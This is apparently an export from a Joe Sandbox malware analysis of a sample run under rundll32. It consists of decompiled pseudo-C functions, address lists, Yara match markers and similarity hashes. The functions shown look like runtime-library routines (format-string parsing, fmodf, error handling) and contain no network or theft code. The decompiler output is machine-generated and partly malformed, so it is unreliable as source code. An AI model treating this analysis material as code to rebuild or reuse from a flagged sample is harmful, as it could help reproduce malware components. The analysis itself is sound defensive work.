                0x2152060d6ae
                0x2152060d6b1
                0x2152060d6b4
                0x2152060d6be
                0x2152060d6d8
                0x2152060d6df
                0x2152060d6e1
                0x2152060d6eb
                0x2152060d6f1
                0x2152060d6f7
                0x2152060d714
                0x2152060d71b
                0x2152060d71d
                0x2152060d72a
                0x2152060d730
                0x2152060d751
                0x2152060d753
                0x2152060d760
                0x2152060d762
                0x2152060d76e
                0x2152060d775
                0x2152060d79c

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID: gfffffff
                • API String ID: 3215553584-1523873471
                • Opcode ID: e0f4c73f1cf080fd4f32a0d3782735035009ff0944299297ae4a53c528665ff5
                • Instruction ID: 42988468a4fef2cfa2dd9988f06436a6c935d78be6d90d1fec46930916802181
                • Opcode Fuzzy Hash: e0f4c73f1cf080fd4f32a0d3782735035009ff0944299297ae4a53c528665ff5
                • Instruction Fuzzy Hash: DF916A73756BD4C6EB218F2991483DE6B56FBB5BD0F248261CF890739AD63AE101C301
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205FC128 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 174COMMON
                Download Yara Rule
                C-Code - Quality: 60%
                			E00000215215205FC128(void* __edx, signed int __edi, long long __rbx, void* __rcx, void* __rdx, long long __rdi, signed int __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _t89;
				signed int _t99;
				unsigned int _t107;
				signed int _t114;
				signed int _t116;
				signed int _t118;
				signed int _t123;
				signed int _t125;
				unsigned int _t132;
				intOrPtr* _t150;
				intOrPtr _t165;
				long long _t170;
				signed int _t172;
				intOrPtr* _t176;
				void* _t179;

				_t174 = __rbp;
				_t172 = __rsi;
				_t170 = __rdi;
				_t150 = _t176;
				 *((long long*)(_t150 + 8)) = __rbx;
				 *((long long*)(_t150 + 0x10)) = __rbp;
				 *((long long*)(_t150 + 0x18)) = __rsi;
				 *((long long*)(_t150 + 0x20)) = __rdi;
				if ( *((intOrPtr*)(__rcx + 0x468)) != __rsi) goto 0x205fc167;
				_t89 = E0000021521520603944(_t150);
				 *_t150 = 0x16;
				E00000215215205FAABC(_t89);
				goto 0x205fc37f;
				if ( *(__rcx + 0x18) == __rsi) goto 0x205fc14f;
				 *((intOrPtr*)(__rcx + 0x470)) =  *((intOrPtr*)(__rcx + 0x470)) + 1;
				if ( *((intOrPtr*)(__rcx + 0x470)) == 2) goto 0x205fc37c;
				_t123 = __edi | 0xffffffff;
				_t10 = _t170 + 0x21; // 0x121
				_t125 = _t10;
				 *((intOrPtr*)(__rcx + 0x50)) = 0;
				 *(__rcx + 0x2c) = 0;
				goto 0x205fc345;
				 *(__rcx + 0x18) =  &(( *(__rcx + 0x18))[1]);
				if ( *(__rcx + 0x28) < 0) goto 0x205fc35e;
				if (( *(__rcx + 0x42) & 0x0000ffff) - _t125 - 0x5a > 0) goto 0x205fc1c5;
				goto 0x205fc1c7;
				_t107 = ( *(__rcx + 0x206302b0) & 0x000000ff) >> 4;
				 *(__rcx + 0x2c) = _t107;
				if (_t107 == 8) goto 0x205fc39a;
				_t132 = _t107;
				if (_t132 == 0) goto 0x205fc2f0;
				if (_t132 == 0) goto 0x205fc2dc;
				if (_t132 == 0) goto 0x205fc29c;
				if (_t132 == 0) goto 0x205fc26a;
				if (_t132 == 0) goto 0x205fc262;
				if (_t132 == 0) goto 0x205fc231;
				if (_t132 == 0) goto 0x205fc224;
				if (_t107 - 0xfffffffffffffffc != 1) goto 0x205fc3aa;
				E00000215215205FCF54(__rcx, __rcx, __rsi, __rbp, _t179);
				goto 0x205fc341;
				E00000215215205FC8B8( *(__rcx + 0x2c), _t150, __rcx);
				goto 0x205fc341;
				if ( *(__rcx + 0x42) == 0x2a) goto 0x205fc249;
				E00000215215205FBA80(__rcx, __rcx, __rcx + 0x38, _t172, _t174);
				goto 0x205fc341;
				 *((long long*)(__rcx + 0x20)) =  *((long long*)(__rcx + 0x20)) + 8;
				_t114 =  *( *((intOrPtr*)(__rcx + 0x20)) - 8);
				_t115 =  <  ? _t123 : _t114;
				 *(__rcx + 0x38) =  <  ? _t123 : _t114;
				goto 0x205fc33f;
				 *(__rcx + 0x38) = 0;
				goto 0x205fc345;
				if ( *(__rcx + 0x42) == 0x2a) goto 0x205fc277;
				goto 0x205fc23c;
				 *((long long*)(__rcx + 0x20)) =  *((long long*)(__rcx + 0x20)) + 8;
				_t116 =  *( *((intOrPtr*)(__rcx + 0x20)) - 8);
				 *(__rcx + 0x34) = _t116;
				if (_t116 >= 0) goto 0x205fc33f;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000004;
				 *(__rcx + 0x34) =  ~_t116;
				goto 0x205fc33f;
				_t99 =  *(__rcx + 0x42) & 0x0000ffff;
				if (_t99 == _t125) goto 0x205fc2d6;
				if (_t99 == 0x23) goto 0x205fc2d1;
				if (_t99 == 0x2b) goto 0x205fc2cb;
				if (_t99 == 0x2d) goto 0x205fc2c5;
				if (_t99 != 0x30) goto 0x205fc345;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000008;
				goto 0x205fc345;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000004;
				goto 0x205fc345;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000001;
				goto 0x205fc345;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | _t125;
				goto 0x205fc345;
				 *(__rcx + 0x30) =  *(__rcx + 0x30) | 0x00000002;
				goto 0x205fc345;
				 *(__rcx + 0x30) = _t172;
				 *((intOrPtr*)(__rcx + 0x40)) = sil;
				 *(__rcx + 0x38) = _t123;
				 *((intOrPtr*)(__rcx + 0x3c)) = 0;
				 *((intOrPtr*)(__rcx + 0x54)) = sil;
				goto 0x205fc345;
				 *((char*)(__rcx + 0x54)) = 1;
				_t165 =  *((intOrPtr*)(__rcx + 0x468));
				if ( *((intOrPtr*)(_t165 + 0x10)) !=  *((intOrPtr*)(_t165 + 8))) goto 0x205fc319;
				if ( *((intOrPtr*)(_t165 + 0x18)) == sil) goto 0x205fc314;
				 *(__rcx + 0x28) =  *(__rcx + 0x28) + 1;
				goto 0x205fc33f;
				 *(__rcx + 0x28) = _t123;
				goto 0x205fc33f;
				 *(__rcx + 0x28) =  *(__rcx + 0x28) + 1;
				 *((long long*)( *((intOrPtr*)(__rcx + 0x468)) + 0x10)) =  *((long long*)( *((intOrPtr*)(__rcx + 0x468)) + 0x10)) + 1;
				 *((short*)( *((intOrPtr*)( *((intOrPtr*)(__rcx + 0x468)))))) =  *(__rcx + 0x42) & 0x0000ffff;
				 *((long long*)( *((intOrPtr*)(__rcx + 0x468)))) =  *((long long*)( *((intOrPtr*)(__rcx + 0x468)))) + 2;
				if (1 == 0) goto 0x205fc3aa;
				_t118 =  *( *(__rcx + 0x18)) & 0x0000ffff;
				 *(__rcx + 0x42) = _t118;
				if (_t118 != 0) goto 0x205fc198;
				 *(__rcx + 0x18) =  &(( *(__rcx + 0x18))[1]);
				if ( *(__rcx + 0x2c) == 0) goto 0x205fc369;
				if ( *(__rcx + 0x2c) != 7) goto 0x205fc39a;
				 *((intOrPtr*)(__rcx + 0x470)) =  *((intOrPtr*)(__rcx + 0x470)) + 1;
				if ( *((intOrPtr*)(__rcx + 0x470)) != 2) goto 0x205fc18d;
				return  *(__rcx + 0x28);
			}


















                0x215205fc128
                0x215205fc128
                0x215205fc128
                0x215205fc128
                0x215205fc12b
                0x215205fc12f
                0x215205fc133
                0x215205fc137
                0x215205fc14d
                0x215205fc14f
                0x215205fc154
                0x215205fc15a
                0x215205fc162
                0x215205fc16b
                0x215205fc16d
                0x215205fc17a
                0x215205fc180
                0x215205fc18a
                0x215205fc18a
                0x215205fc18d
                0x215205fc190
                0x215205fc193
                0x215205fc198
                0x215205fc1a0
                0x215205fc1b4
                0x215205fc1c3
                0x215205fc1d1
                0x215205fc1d4
                0x215205fc1da
                0x215205fc1e0
                0x215205fc1e2
                0x215205fc1eb
                0x215205fc1f4
                0x215205fc1fd
                0x215205fc202
                0x215205fc207
                0x215205fc20c
                0x215205fc211
                0x215205fc21a
                0x215205fc21f
                0x215205fc227
                0x215205fc22c
                0x215205fc236
                0x215205fc23f
                0x215205fc244
                0x215205fc249
                0x215205fc252
                0x215205fc257
                0x215205fc25a
                0x215205fc25d
                0x215205fc262
                0x215205fc265
                0x215205fc26f
                0x215205fc275
                0x215205fc277
                0x215205fc280
                0x215205fc283
                0x215205fc288
                0x215205fc28e
                0x215205fc294
                0x215205fc297
                0x215205fc29c
                0x215205fc2a2
                0x215205fc2a7
                0x215205fc2ac
                0x215205fc2b1
                0x215205fc2b6
                0x215205fc2bc
                0x215205fc2c0
                0x215205fc2c5
                0x215205fc2c9
                0x215205fc2cb
                0x215205fc2cf
                0x215205fc2d1
                0x215205fc2d4
                0x215205fc2d6
                0x215205fc2da
                0x215205fc2dc
                0x215205fc2e0
                0x215205fc2e4
                0x215205fc2e7
                0x215205fc2ea
                0x215205fc2ee
                0x215205fc2f4
                0x215205fc2f8
                0x215205fc307
                0x215205fc30d
                0x215205fc30f
                0x215205fc312
                0x215205fc314
                0x215205fc317
                0x215205fc319
                0x215205fc323
                0x215205fc331
                0x215205fc33b
                0x215205fc343
                0x215205fc349
                0x215205fc34c
                0x215205fc353
                0x215205fc359
                0x215205fc361
                0x215205fc367
                0x215205fc369
                0x215205fc376
                0x215205fc399

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID: *
                • API String ID: 3215553584-163128923
                • Opcode ID: ddef714bbed3b668a8c1992db142bc22af8731cb911405b7755d3538c847e4f3
                • Instruction ID: 73701b017c1bb8fb93b7de69eec68e59e6eaf35ce8a854fd5b84126a25ed3ddd
                • Opcode Fuzzy Hash: ddef714bbed3b668a8c1992db142bc22af8731cb911405b7755d3538c847e4f3
                • Instruction Fuzzy Hash: 11818577606A30C6E7688F29825C2AC3FB0FBAAF98F2455A9DF46422DCD739C441D740
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00000215205FBF24 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 145COMMON
                Download Yara Rule
                C-Code - Quality: 65%
                			E00000215215205FBF24(void* __edx, signed int __edi, void* __ebp, intOrPtr* __rax, long long __rbx, void* __rcx, void* __rdx, long long __rbp, long long _a8, long long _a16) {
				void* _t73;
				unsigned int _t80;
				intOrPtr _t91;
				signed int _t97;
				signed int _t99;
				char _t101;
				signed int _t105;
				unsigned int _t113;
				void* _t133;
				void* _t143;

				_a8 = __rbx;
				_a16 = __rbp;
				_t133 = __rcx;
				if ( *((long long*)(__rcx + 0x468)) != 0) goto 0x205fbf58;
				_t73 = E0000021521520603944(__rax);
				 *__rax = 0x16;
				E00000215215205FAABC(_t73);
				goto 0x205fc102;
				if ( *((long long*)(__rcx + 0x18)) == 0) goto 0x205fbf40;
				 *((intOrPtr*)(__rcx + 0x470)) =  *((intOrPtr*)(__rcx + 0x470)) + 1;
				if ( *((intOrPtr*)(__rcx + 0x470)) == 2) goto 0x205fc0ff;
				_t105 = __edi | 0xffffffff;
				 *(__rcx + 0x50) =  *(__rcx + 0x50) & 0x00000000;
				 *(__rcx + 0x2c) =  *(__rcx + 0x2c) & 0x00000000;
				goto 0x205fc0d7;
				 *((long long*)(__rcx + 0x18)) =  *((long long*)(__rcx + 0x18)) + 1;
				if ( *((intOrPtr*)(__rcx + 0x28)) < 0) goto 0x205fc0ec;
				if ( *((intOrPtr*)(__rcx + 0x41)) - 0x20 - 0x5a > 0) goto 0x205fbfb2;
				_t128 =  *((char*)(__rcx + 0x41));
				goto 0x205fbfb4;
				_t80 = ( *( *((char*)(__rcx + 0x41)) + 0x20630250) & 0x000000ff) >> 4;
				 *(__rcx + 0x2c) = _t80;
				if (_t80 == 8) goto 0x205fc112;
				_t113 = _t80;
				if (_t113 == 0) goto 0x205fc0cb;
				if (_t113 == 0) goto 0x205fc0b2;
				if (_t113 == 0) goto 0x205fc07d;
				if (_t113 == 0) goto 0x205fc051;
				if (_t113 == 0) goto 0x205fc048;
				if (_t113 == 0) goto 0x205fc01b;
				if (_t113 == 0) goto 0x205fc00e;
				if (_t80 - 0xfffffffffffffffc != 1) goto 0x205fc122;
				E00000215215205FCCD8( *((char*)(__rcx + 0x41)), __rcx, __rcx, _t143, 0x20630250);
				goto 0x205fc0d3;
				E00000215215205FC73C(_t128, _t133);
				goto 0x205fc0d3;
				if ( *((char*)(_t133 + 0x41)) == 0x2a) goto 0x205fc032;
				E00000215215205FB9FC(_t133, _t133, _t133 + 0x38);
				goto 0x205fc0d3;
				 *((long long*)(_t133 + 0x20)) =  *((long long*)(_t133 + 0x20)) + 8;
				_t97 =  *( *((intOrPtr*)(_t133 + 0x20)) - 8);
				_t98 =  <  ? _t105 : _t97;
				 *(_t133 + 0x38) =  <  ? _t105 : _t97;
				goto 0x205fc079;
				 *(_t133 + 0x38) =  *(_t133 + 0x38) & 0x00000000;
				goto 0x205fc0d7;
				if ( *((char*)(_t133 + 0x41)) == 0x2a) goto 0x205fc05d;
				goto 0x205fc025;
				 *((long long*)(_t133 + 0x20)) =  *((long long*)(_t133 + 0x20)) + 8;
				_t99 =  *( *((intOrPtr*)(_t133 + 0x20)) - 8);
				 *(_t133 + 0x34) = _t99;
				if (_t99 >= 0) goto 0x205fc079;
				 *(_t133 + 0x30) =  *(_t133 + 0x30) | 0x00000004;
				 *(_t133 + 0x34) =  ~_t99;
				goto 0x205fc0d3;
				_t91 =  *((intOrPtr*)(_t133 + 0x41));
				if (_t91 == 0x20) goto 0x205fc0ac;
				if (_t91 == 0x23) goto 0x205fc0a6;
				if (_t91 == 0x2b) goto 0x205fc0a0;
				if (_t91 == 0x2d) goto 0x205fc09a;
				if (_t91 != 0x30) goto 0x205fc0d7;
				 *(_t133 + 0x30) =  *(_t133 + 0x30) | 0x00000008;
				goto 0x205fc0d7;
				 *(_t133 + 0x30) =  *(_t133 + 0x30) | 0x00000004;
				goto 0x205fc0d7;
				 *(_t133 + 0x30) =  *(_t133 + 0x30) | 0x00000001;
				goto 0x205fc0d7;
				 *(_t133 + 0x30) =  *(_t133 + 0x30) | 0x00000020;
				goto 0x205fc0d7;
				 *(_t133 + 0x30) =  *(_t133 + 0x30) | 0x00000002;
				goto 0x205fc0d7;
				 *(_t133 + 0x34) =  *(_t133 + 0x34) & 0x00000000;
				 *(_t133 + 0x30) =  *(_t133 + 0x30) & 0x00000000;
				 *(_t133 + 0x3c) =  *(_t133 + 0x3c) & 0x00000000;
				 *((char*)(_t133 + 0x40)) = 0;
				 *(_t133 + 0x38) = _t105;
				 *((char*)(_t133 + 0x54)) = 0;
				goto 0x205fc0d7;
				if (E00000215215205FC420(_t133) == 0) goto 0x205fc122;
				_t101 =  *((intOrPtr*)( *((intOrPtr*)(_t133 + 0x18))));
				 *((char*)(_t133 + 0x41)) = _t101;
				if (_t101 != 0) goto 0x205fbf89;
				 *((long long*)(_t133 + 0x18)) =  *((long long*)(_t133 + 0x18)) + 1;
				 *((intOrPtr*)(_t133 + 0x470)) =  *((intOrPtr*)(_t133 + 0x470)) + 1;
				if ( *((intOrPtr*)(_t133 + 0x470)) != 2) goto 0x205fbf7c;
				return  *((intOrPtr*)(_t133 + 0x28));
			}













                0x215205fbf24
                0x215205fbf29
                0x215205fbf3b
                0x215205fbf3e
                0x215205fbf40
                0x215205fbf45
                0x215205fbf4b
                0x215205fbf53
                0x215205fbf5d
                0x215205fbf5f
                0x215205fbf6c
                0x215205fbf72
                0x215205fbf7c
                0x215205fbf80
                0x215205fbf84
                0x215205fbf89
                0x215205fbf91
                0x215205fbfa1
                0x215205fbfa3
                0x215205fbfb0
                0x215205fbfbb
                0x215205fbfbe
                0x215205fbfc4
                0x215205fbfca
                0x215205fbfcc
                0x215205fbfd5
                0x215205fbfde
                0x215205fbfe7
                0x215205fbfec
                0x215205fbff1
                0x215205fbff6
                0x215205fbffb
                0x215205fc004
                0x215205fc009
                0x215205fc011
                0x215205fc016
                0x215205fc01f
                0x215205fc028
                0x215205fc02d
                0x215205fc032
                0x215205fc03b
                0x215205fc040
                0x215205fc043
                0x215205fc046
                0x215205fc048
                0x215205fc04c
                0x215205fc055
                0x215205fc05b
                0x215205fc05d
                0x215205fc066
                0x215205fc069
                0x215205fc06e
                0x215205fc070
                0x215205fc076
                0x215205fc07b
                0x215205fc07d
                0x215205fc082
                0x215205fc086
                0x215205fc08a
                0x215205fc08e
                0x215205fc092
                0x215205fc094
                0x215205fc098
                0x215205fc09a
                0x215205fc09e
                0x215205fc0a0
                0x215205fc0a4
                0x215205fc0a6
                0x215205fc0aa
                0x215205fc0ac
                0x215205fc0b0
                0x215205fc0b2
                0x215205fc0b6
                0x215205fc0ba
                0x215205fc0be
                0x215205fc0c2
                0x215205fc0c5
                0x215205fc0c9
                0x215205fc0d5
                0x215205fc0db
                0x215205fc0dd
                0x215205fc0e2
                0x215205fc0e8
                0x215205fc0ec
                0x215205fc0f9
                0x215205fc111

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID: %02x
                • API String ID: 3215553584-560843007
                • Opcode ID: 274589d0b80415c0360180f46b1368b715075c39fab3c08802e67829739cb148
                • Instruction ID: 26577bc37044df152b7d14dece8756303fbebe20a02736be739dded4cebb4244
                • Opcode Fuzzy Hash: 274589d0b80415c0360180f46b1368b715075c39fab3c08802e67829739cb148
                • Instruction Fuzzy Hash: FA515273246A60CAF7688E38824D3ED3FA5FBA7B59F1411A5CE424229DCB3DC486C705
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535EA718 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 140COMMON
                Download Yara Rule
                C-Code - Quality: 34%
                			E00007FFA7FFA535EA718(void* __ecx, void* __edx, intOrPtr _a8, intOrPtr _a16, signed long long _a24, long long _a32, long long _a40, long long _a64) {
				signed int _t25;
				void* _t27;
				void* _t36;
				void* _t38;
				unsigned long long _t57;
				unsigned long long _t66;
				void* _t67;
				signed long long _t72;
				signed long long _t73;
				signed long long _t75;
				signed long long _t77;
				signed long long _t78;

				asm("movss [esp+0x8], xmm0");
				asm("movaps xmm4, xmm1");
				asm("movaps xmm1, xmm0");
				asm("xorps xmm2, xmm2");
				asm("cvtss2sd xmm2, xmm1");
				asm("xorps xmm3, xmm3");
				asm("movsd [esp+0x70], xmm2");
				_t72 = _a24;
				asm("cvtss2sd xmm3, xmm4");
				_t75 = _t72 & 0xffffffff;
				_t57 = _t72 >> 0x34;
				asm("movsd [esp+0x70], xmm3");
				_t78 = _a24;
				_t77 = _t78 & 0xffffffff;
				_t66 = _t78 >> 0x34;
				if (_t57 - 1 < 0) goto 0x535ea8c4;
				if (_t57 - 0x7fe > 0) goto 0x535ea8cc;
				if (_t66 - 1 - 0x7fd > 0) goto 0x535ea8c4;
				if (_t75 != _t77) goto 0x535ea7c2;
				_t73 = _t72 & 0x00000000;
				_a24 = _t73;
				asm("movsd xmm0, [esp+0x70]");
				asm("cvtpd2ps xmm0, xmm0");
				goto 0x535ea957;
				_a24 = _t75;
				asm("movsd xmm2, [esp+0x70]");
				_a24 = _t77;
				asm("movsd xmm3, [esp+0x70]");
				_t36 = _t75 - _t77;
				if (_t36 >= 0) goto 0x535ea7f8;
				asm("xorps xmm0, xmm0");
				asm("comiss xmm0, xmm1");
				if (_t36 <= 0) goto 0x535ea7ec;
				asm("xorps xmm2, [0x86974]");
				asm("xorps xmm0, xmm0");
				asm("cvtsd2ss xmm0, xmm2");
				goto 0x535ea957;
				asm("stmxcsr dword [esp+0x68]");
				r8d = _a16;
				if (_t57 - _t66 <= 0) goto 0x535ea87c;
				_t67 = _t66 + 0x2aaaaaab;
				_a24 = _t25 << 0x34;
				asm("movsd xmm0, [esp+0x70]");
				asm("mulsd xmm0, xmm3");
				_a24 = 0;
				asm("movsd xmm4, [esp+0x70]");
				asm("movaps xmm3, xmm0");
				_t38 = _t67;
				if (_t38 <= 0) goto 0x535ea87c;
				asm("movaps xmm0, xmm2");
				asm("divsd xmm0, xmm3");
				asm("cvttsd2si eax, xmm0");
				asm("movd xmm1, eax");
				asm("cvtdq2pd xmm1, xmm1");
				asm("mulsd xmm1, xmm3");
				asm("mulsd xmm3, xmm4");
				asm("subsd xmm2, xmm1");
				if (_t38 != 0) goto 0x535ea857;
				asm("movaps xmm0, xmm2");
				_a16 = r8d;
				asm("divsd xmm0, xmm3");
				asm("cvttsd2si eax, xmm0");
				asm("movd xmm1, eax");
				asm("cvtdq2pd xmm1, xmm1");
				asm("mulsd xmm1, xmm3");
				asm("subsd xmm2, xmm1");
				asm("movsd [esp+0x70], xmm2");
				asm("ldmxcsr dword [esp+0x68]");
				asm("xorps xmm0, xmm0");
				asm("comiss xmm0, [esp+0x60]");
				asm("movaps xmm0, xmm2");
				if (_t38 <= 0) goto 0x535ea8bb;
				asm("xorps xmm0, [0x868a5]");
				asm("cvtsd2ss xmm0, xmm0");
				goto 0x535ea957;
				if (_t67 - 1 - 0x7fe <= 0) goto 0x535ea8e3;
				if ((0xffffffff & _t73) == 0) goto 0x535ea917;
				asm("movss [esp+0x60], xmm1");
				goto 0x535ea900;
				if (_t67 - 0x7fe <= 0) goto 0x535ea90d;
				if ((0xffffffff & _t78) == 0) goto 0x535ea957;
				asm("movss [esp+0x60], xmm4");
				goto 0x535f0dbc;
				if (_a8 - 1 >= 0) goto 0x535ea917;
				if (_t67 - 1 >= 0) goto 0x535ea957;
				_a64 = 2;
				asm("movss [esp+0x38], xmm4");
				r9d = 1;
				asm("movss [esp+0x30], xmm1");
				r8d = 0xffc00000;
				_a40 = 0x21;
				_a32 = 8;
				return E00007FFA7FFA535F0C6C(_t27, _t75 + 0x15, _t67 - 1, 0x53671ccc, _t67, _t73);
			}















                0x7ffa535ea718
                0x7ffa535ea72c
                0x7ffa535ea72f
                0x7ffa535ea732
                0x7ffa535ea735
                0x7ffa535ea739
                0x7ffa535ea73c
                0x7ffa535ea742
                0x7ffa535ea747
                0x7ffa535ea751
                0x7ffa535ea754
                0x7ffa535ea758
                0x7ffa535ea75e
                0x7ffa535ea769
                0x7ffa535ea76c
                0x7ffa535ea77c
                0x7ffa535ea788
                0x7ffa535ea796
                0x7ffa535ea79f
                0x7ffa535ea7ab
                0x7ffa535ea7ae
                0x7ffa535ea7b3
                0x7ffa535ea7b9
                0x7ffa535ea7bd
                0x7ffa535ea7c2
                0x7ffa535ea7c7
                0x7ffa535ea7cd
                0x7ffa535ea7d2
                0x7ffa535ea7d8
                0x7ffa535ea7db
                0x7ffa535ea7dd
                0x7ffa535ea7e0
                0x7ffa535ea7e3
                0x7ffa535ea7e5
                0x7ffa535ea7ec
                0x7ffa535ea7ef
                0x7ffa535ea7f3
                0x7ffa535ea7f8
                0x7ffa535ea7fd
                0x7ffa535ea804
                0x7ffa535ea817
                0x7ffa535ea834
                0x7ffa535ea839
                0x7ffa535ea83f
                0x7ffa535ea843
                0x7ffa535ea848
                0x7ffa535ea84e
                0x7ffa535ea851
                0x7ffa535ea853
                0x7ffa535ea857
                0x7ffa535ea85a
                0x7ffa535ea85e
                0x7ffa535ea862
                0x7ffa535ea866
                0x7ffa535ea86a
                0x7ffa535ea86e
                0x7ffa535ea872
                0x7ffa535ea87a
                0x7ffa535ea87c
                0x7ffa535ea87f
                0x7ffa535ea884
                0x7ffa535ea888
                0x7ffa535ea88c
                0x7ffa535ea890
                0x7ffa535ea894
                0x7ffa535ea898
                0x7ffa535ea89c
                0x7ffa535ea8a2
                0x7ffa535ea8a7
                0x7ffa535ea8aa
                0x7ffa535ea8af
                0x7ffa535ea8b2
                0x7ffa535ea8b4
                0x7ffa535ea8bb
                0x7ffa535ea8bf
                0x7ffa535ea8ca
                0x7ffa535ea8d9
                0x7ffa535ea8db
                0x7ffa535ea8e1
                0x7ffa535ea8e9
                0x7ffa535ea8f8
                0x7ffa535ea8fa
                0x7ffa535ea908
                0x7ffa535ea910
                0x7ffa535ea915
                0x7ffa535ea917
                0x7ffa535ea926
                0x7ffa535ea92c
                0x7ffa535ea932
                0x7ffa535ea938
                0x7ffa535ea93e
                0x7ffa535ea946
                0x7ffa535ea95b

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.547213068.00007FFA535E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FFA535E0000, based on PE: true
                • Associated: 0000000E.00000002.547204501.00007FFA535E0000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547252006.00007FFA535FC000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547412222.00007FFA5367C000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547421505.00007FFA5367D000.00000008.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547659278.00007FFA53754000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 0000000E.00000002.547667608.00007FFA53756000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_7ffa535e0000_rundll32.jbxd
                Similarity
                • API ID: _handle_errorf
                • String ID: !$fmodf
                • API String ID: 2315412904-1366221206
                • Opcode ID: 809ba85aedd89a7189055f61ead85860735a5eea0ac88f8d965bf70d4784b19b
                • Instruction ID: bffad52782ab9adb1ac216f743baebd478a33d63fd8551fb4a0f8024e73271d4
                • Opcode Fuzzy Hash: 809ba85aedd89a7189055f61ead85860735a5eea0ac88f8d965bf70d4784b19b
                • Instruction Fuzzy Hash: A851EC32D2CF854BD612C7355441239A2A6EFD7390F14D336FA5E76AE5DB2CE4829E00
                Uniqueness

                Uniqueness Score: -1.00%

                Function 000002152060D870 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                Download Yara Rule
                C-Code - Quality: 100%
                			E000002152152060D870(void* __ebx, void* __edx, long long __rbx, void* __rcx, void* __rdx, long long __rdi, long long __rsi, long long __rbp, void* _a8, void* _a16, void* _a24, void* _a32) {
				void* _t11;
				void* _t13;
				intOrPtr* _t21;
				intOrPtr* _t35;

				_t21 = _t35;
				 *((long long*)(_t21 + 8)) = __rbx;
				 *((long long*)(_t21 + 0x10)) = __rbp;
				 *((long long*)(_t21 + 0x18)) = __rsi;
				 *((long long*)(_t21 + 0x20)) = __rdi;
				r15b = r9b;
				_t10 =  >  ? __ebx : 0;
				_t11 = ( >  ? __ebx : 0) + 9;
				if (__rdx - _t21 > 0) goto 0x2060d8d5;
				_t13 = E0000021521520603944(_t21);
				 *_t21 = 0x22;
				E00000215215205FAABC(_t13);
				return 0x22;
			}







                0x2152060d870
                0x2152060d873
                0x2152060d877
                0x2152060d87b
                0x2152060d87f
                0x2152060d891
                0x2152060d89a
                0x2152060d89d
                0x2152060d8a5
                0x2152060d8a7
                0x2152060d8b1
                0x2152060d8b3
                0x2152060d8d4

                APIs
                Strings
                Memory Dump Source
                • Source File: 0000000E.00000002.546822241.0000021520580000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021520580000, based on PE: true
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_14_2_21520580000_rundll32.jbxd
                Yara matches
                Similarity
                • API ID: _invalid_parameter_noinfo
                • String ID: e+000$gfff
                • API String ID: 3215553584-3030954782
                • Opcode ID: f0870509f4bf2c1319244e35407b9456a7ad99be4f2c05992efcf4f480597c09
                • Instruction ID: ec8faed8d9b780c307538c5e1dd67bde41f22ea5541e1c9a6bbd6ea16c42abaf
                • Opcode Fuzzy Hash: f0870509f4bf2c1319244e35407b9456a7ad99be4f2c05992efcf4f480597c09
                • Instruction Fuzzy Hash: 5D512373755BD0C6E7348B39984839A6B92FBE1B90F1893A1DA9847BDECA3DD440C700
                Uniqueness

                Uniqueness Score: -1.00%

                Function 00007FFA535E7350 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                Download Yara Rule
                C-Code - Quality: 48%
                			E00007FFA7FFA535E7350(void* __ecx, void* __rax, long long __rbx, void* __rcx, void* __r8, long long _a8, long long _a16, signed int _a24, char _a32) {
				long long _v56;
				void* __rdi;
				void* __rsi;
				void* __rbp;
				void* _t26;
				intOrPtr* _t48;
				long long* _t49;
				long long _t52;
				long long _t58;
				void* _t60;
				long long _t78;
				long long _t81;
				long long _t82;
				intOrPtr* _t83;
				void* _t87;

				_t60 = __rcx;
				_a8 = __rbx;
				_t2 = _t60 - 1; // -1
				_t48 = _t2;
				r14d = __ecx;
				if (_t48 - 1 <= 0) goto 0x535e7384;
				_t26 = E00007FFA7FFA535E8380(_t48);
				asm("push cs");
				 *_t48 =  *_t48 + _t26;
				goto 0x535e74b3;
				E00007FFA7FFA535EEA94();
				r8d = 0x104;
				GetModuleFileNameA(??, ??, ??);
				_t83 =  *0x53755730; // 0x2151e483370
				 *0x53755740 = 0x53754cf0;
				if (_t83 == 0) goto 0x535e73bb;
